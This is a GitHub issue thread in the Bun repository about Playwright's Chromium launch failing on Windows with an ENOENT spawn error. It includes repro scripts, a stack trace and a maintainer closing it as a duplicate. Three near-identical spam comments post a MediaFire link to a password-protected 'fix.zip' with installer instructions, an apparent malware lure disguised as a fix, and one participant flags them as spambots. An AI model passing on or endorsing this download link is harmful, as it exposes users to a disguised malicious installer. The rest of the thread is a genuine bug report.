### ISSUE TITLE
playwright on windows doesn't work

### ISSUE THREAD

**Issue by kjk** [oven-sh/bun#13543] opened 2024-08-26 10:45 UTC
### What version of Bun is running?

Bun v1.1.27-canary.3+7529cd76b (Windows x64)

### What platform is your computer?

Microsoft Windows NT 10.0.22631.0 x64

### What steps can reproduce the bug?

Install latest playwright: `npm init playwright@latest`

Create `repro.js`:
```javascript
import { chromium } from "playwright";

(async () => {
  const browser = await chromium.launch({ headless: true });
  console.log(browser);
})();
```

run with: `bun ./repro.js`

### What is the expected behavior?

Should work.

### What do you see instead?

I get the following error:
```
PS C:\Users\kjk\src\hack\spider> bun .\repro.js
111 |     env: options.env,
112 |     cwd: options.cwd,
113 |     shell: options.shell,
114 |     stdio
115 |   };
116 |   const spawnedProcess = childProcess.spawn(options.command, options.args || [], spawnOptions);
                                            ^
ENOENT: Failed to connect
   errno: 2
 syscall: "connect"

      at connect (node:net:354:10)
      at new  (node:net:16:31)
      at #getBunSpawnIo (node:child_process:623:17)
      at #createStdioObject (node:child_process:680:21)
      at node:child_process:714:12
      at spawn (node:child_process:726:8)
      at node:child_process:2:21
      at C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\utils\processLauncher.js:116:39
      at launchProcess (C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\utils\processLauncher.js:103:30)
      at C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\server\browserType.js:187:36
111 |     env: options.env,
112 |     cwd: options.cwd,
113 |     shell: options.shell,
114 |     stdio
115 |   };
116 |   const spawnedProcess = childProcess.spawn(options.command, options.args || [], spawnOptions);
                                            ^
ENOENT: Failed to connect
   errno: 2
 syscall: "connect"

      at connect (node:net:354:10)
      at new  (node:net:16:31)
      at #getBunSpawnIo (node:child_process:623:17)
      at #createStdioObject (node:child_process:680:21)
      at node:child_process:714:12
      at spawn (node:child_process:726:8)
      at node:child_process:2:21
      at C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\utils\processLauncher.js:116:39
      at launchProcess (C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\utils\processLauncher.js:103:30)
      at C:\Users\kjk\src\hack\spider\node_modules\playwright-core\lib\server\browserType.js:187:36
```

### Additional information

This works with `node ./repro.js`

**Comment by qlqw233** [comment] 2024-08-26 10:45
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment] 2024-08-26 10:45
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment] 2024-08-26 10:45
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosmoMyzrailGorynych** [comment] 2024-08-26 11:00
⏫ Please ignore and report these spambots

**Comment by guzmanoj** [comment] 2024-09-05 14:26
Same here using Bun v1.1.26 (Windows x64) and Playwright 1.46.1
Repro steps on Windows:
cd into an empty directory and` bun init`
`bun install playwright@latest` // (currently v146.1)
`bun --bun x playwright install --with-deps chromium` 
update the index.ts file:
```
import { chromium } from 'playwright';

(async () => {
    const browser = await chromium.launch({ headless: false });
    const page = await browser.newPage();
    await page.goto('https://bun.sh/');
    await page.screenshot({ path: 'screen.png' });
    await browser.close();
})();
```
`bun ./index.ts`

This results in the same error provided by @kjk

**Comment by Jarred-Sumner** [comment] 2024-09-09 19:42
Duplicate of #13042

**Comment by Jarred-Sumner** [comment] 2024-09-09 19:42
We are tracking this in #13042, please follow along there

**Closed as not planned by Jarred-Sumner** 2024-09-09 19:42 UTC
Labels: bug, needs triage
